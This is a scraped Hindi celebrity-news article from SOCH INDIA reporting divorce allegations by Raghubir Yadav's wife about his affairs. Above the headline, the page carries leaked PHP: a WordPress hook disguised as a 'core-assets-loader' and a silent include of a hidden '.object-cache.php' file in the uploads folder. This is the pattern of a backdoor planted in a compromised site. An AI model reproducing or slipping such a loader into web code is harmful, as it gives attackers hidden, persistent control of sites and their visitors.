add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); रघुवीर यादव पर पत्नी का बड़ा आरोप- संजय मिश्रा की पत्नी से हैं अवैध संबंध, नंदिता दास से भी रहा है अफेयर – SOCH INDIA
Menu

देश
रघुवीर यादव पर पत्नी का बड़ा आरोप- संजय मिश्रा की पत्नी से हैं अवैध संबंध, नंदिता दास से भी रहा है अफेयर

nobanner

‘लगान’, ‘पीपली लाइव’, ‘सुई धागा’ और ‘न्यूटन’ जैसी फिल्मों में नजर आए अभिनेता रघुबीर यादव (Raghuveer Yadav) की पत्नी पूर्णिमा खारगा ने आरोप लगाया है कि उनके पति और अभिनेता संजय मिश्रा (Sanjay Mishra) की पत्नी का अवैध संबंध रहा है और दोनों का एक 14 वर्षीय बेटा भी है. एक रिपोर्ट के अनुसार, पूर्णिमा अंतरराष्ट्रीय ख्याति की कथक नृत्यांगना रही हैं. उन्होंने यादव पर धोखा देने का आरोप लगाते हुए तलाक के लिए अर्जी दायर की है.

पोर्टल के अनुसार, पूर्णिमा ने पहले भी आरोप लगाया था कि उनके पति अभिनेता संजय मिश्रा की पत्नी रोशनी अचरेजा के साथ लिव-इन रिलेशनशिप में रह चुके हैं और उन दोनों का एक 14 साल का बेटा भी है.

वहीं पूर्णिमा ने यह भी आरोप लगाया कि शादी के सात साल बाद रघुबीर को राज बारोट के शो पर काम करने के दौरान अभिनेत्री नंदिता दास (Nandita Das) से प्यार हो गया था.एक इंटरव्यू के दौरान पूर्णिमा ने ये भी खुलासा किया कि रघु नंदिता को अपने माता-पिता से भी मिलवाने ले गए थे, फिर आकर मुझसे तलाक फाइल कर दिया. वह नंदिता से शादी करना चाहते थे, लेकिन नंदिता ने ही उन्हें छोड़ दिया. इसके बाद रघु संजय मिश्रा की पत्नी के प्यार में पड़ गए.

रिपोर्ट के अनुसार, पूर्णिमा ने इस सप्ताह की शुरुआत में तलाक के लिए अर्जी दी है और साथ ही एक लाख रुपये अंतरिम भरण-पोषण और 10 करोड़ रुपये अंतरिम गुजारा भत्ता के तौर पर मांगा है. पूर्णिमा और रघुबीर अलग-अलग रहते हैं, वहीं उनका 30 वर्षीय बेटा अपनी मां के साथ रहता है. बता दें कि 1988 में रघुवीर और पूर्णिमा की शादी हुई थी. वह पेशे से अंतरराष्ट्रीय कथक डांसर थीं. पुर्णिमा का कहना है कि उन्होंने रघुवीर के लिए अपना करियर छोड़ दिया था.